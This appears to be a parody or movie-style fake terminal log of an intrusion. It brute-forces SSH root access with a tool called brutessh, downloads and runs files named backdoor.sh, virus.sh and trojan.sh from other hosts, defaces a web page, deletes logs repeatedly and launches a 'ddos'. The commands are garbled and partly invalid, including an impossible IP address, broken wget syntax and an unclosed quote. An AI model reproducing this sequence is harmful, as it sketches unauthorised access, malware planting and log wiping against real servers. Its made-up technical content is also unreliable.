ssh 10.1.100.1
password odjkelwnfkjhqwuhuihfkahjefhjkeahfkahfsiofjiowejedkawenfkajfnadhsjaKD
ssh 10.2.3.123
password asodjiweqjhfilhafjkfjkahdkjashdfjhaf,jksdfhaskjdhahdfjksahfjdsfhjkadh
ssh 12.2.3.345
password asdjklsajdlkasDJWIODJOIjalskdjdkljwkdlwjqJIWJKLAfjKSANDKLjdODJLWKDJWL
ssh 1.23.4.21
password irqor32or2uqijiweofjljwaljdjeiwrj2o3jdiewfjlewfqwewekwqelødadldjqwl
wget http://debianuser.org/bruteforce/brutessh.zip
unzip brutessh.zip
aptitude install python-crypto python-paramiko
kristoffer@eckhoff:~$ python brutessh.py -h 10.1.100.4 -u root -r 8 &
*************************************
*SSH Bruteforcer Ver. 0.2           *
*Coded by Kristoffer Eckhoff      *
*Edge-Security Research             *
*kristoffereckhoff@gmail.com                 *
*************************************
HOST: 10.1.100.4 Username: root Password file: random 8
===========================================================================
Trying password with 8 combinations...

kristoffer@eckhoff:~$ python brutessh.py -h 10.1.100.4 -u root -d passlist.txt &
*************************************
*SSH Bruteforcer Ver. 0.2           *
*Coded by Kristoffer Eckhoff      *
*Edge-Security Research             *
*kristoffereckhoff@gmail.com                 *
*************************************
HOST: 10.1.100.4 Username: root Password file: passlist.txt
Trying....113230423489419 combinations
Passoword is: dragon, found with dictionary attack
./quitall brutessh
ssh 10.1.100.4
password: dragon
wget 10.1.2.101 backdoor.sh &
wget 10.1.2.101 virus.sh &
wget 10.1.1.101 trojan.sh &
wget 10.1.1.101 deletelogs &
wget 10.1.1.101 swordfishalgo.sh &
./backdoor.sh
./virus.sh
./trojan.sh
./swordfishalgo.sh
cd /home/topsecretagencyfirmimpossibletohack/www/index.html
echo "hacked by doffen >> index.html
./deletalogs
logout
ssh 10.1.100.1
password odjkelwnfkjhqwuhuihfkahjefhjkeahfkahfsiofjiowejedkawenfkajfnadhsjaKD
ssh 10.2.3.123
password asodjiweqjhfilhafjkfjkahdkjashdfjhaf,jksdfhaskjdhahdfjksahfjdsfhjkadh
ssh 12.2.3.345
password asdjklsajdlkasDJWIODJOIjalskdjdkljwkdlwjqJIWJKLAfjKSANDKLjdODJLWKDJWL
ssh 1.23.4.21
password irqor32or2uqijiweofjljwaljdjeiwrj2o3jdiewfjlewfqwewekwqelødadldjqwl
./ddos 10.1.100.4
ddos started...
website is now down...
logout
./deletelogs
logout
./deletelogs
logout
./deletelogs
logout
.deletelogs
./launch Firefox -url 10.1.100.4



